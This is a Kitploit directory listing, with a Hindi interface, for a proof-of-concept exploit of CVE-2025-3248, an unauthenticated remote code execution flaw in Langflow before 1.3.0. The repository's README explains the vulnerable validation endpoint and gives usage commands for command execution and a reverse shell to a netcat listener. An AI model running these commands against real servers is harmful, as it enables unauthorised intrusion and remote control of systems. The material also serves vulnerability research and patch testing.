Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Langflow-RCE-CVE-2025-3248 — Proof-of-concept exploit for CVE-2025-3248, a remote code execution vulnerability in Langflow, demonstrating exploitation of the vulnerable endpoint. | Kitploit
उपकरण/GitHubGitHub/leotheggman/langflow-rce-cve-2025-3248
Vulnerability AnalysisExploitationWeb Application Exploitation
GitHubleotheggman/langflow-rce-cve-2025-3248

Langflow-RCE-CVE-2025-3248

Proof-of-concept exploit for CVE-2025-3248, a remote code execution vulnerability in Langflow, demonstrating exploitation of the vulnerable endpoint.

रिपॉजिटरी देखें
39 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
अनुरोधित भाषा में सामग्री उपलब्ध नहीं है। अंग्रेज़ी संस्करण दिखाया जा रहा है।

CVE-2025-3248 — Langflow Unauthenticated RCE PoC

A clean, tested proof-of-concept for CVE-2025-3248, an unauthenticated remote code execution vulnerability in Langflow versions prior to 1.3.0.

banner python license


What is CVE-2025-3248?

Langflow's /api/v1/validate/code endpoint accepts Python code for static validation without requiring authentication. Because Python evaluates decorator expressions and default arguments at function-definition time — before the function body ever runs — an attacker can smuggle arbitrary code execution into a decorator expression:

Features

✅ Unauthenticated command execution ✅ Reverse shell mode (no target-side netcat needed) ✅ Built-in detection signal (checks for 'NoneType' marker) ✅ Clean modular structure ✅ Verified against Docker images 1.1.4 (vulnerable) and 1.3.0 (patched)

Installation

git clone https://github.com/LeotheGGman/Langflow-RCE-CVE-2025-3248.git cd Langflow-RCE-CVE-2025-3248 python3 -m venv venv source venv/bin/activate pip install -r requirements.txt

Usage

python3 exploit.py -u http://target:7860 -c "id > /tmp/pwned.txt" Fire a reverse shell Terminal A (your listener) nc -lvnp 4444 Terminal B python3 exploit.py -u http://target:7860
--revshell --lhost 172.17.0.1 --lport 4444

Verbose mode python3 exploit.py -u http://target:7860 -c "whoami" --verbose

टूल डाउनलोड करें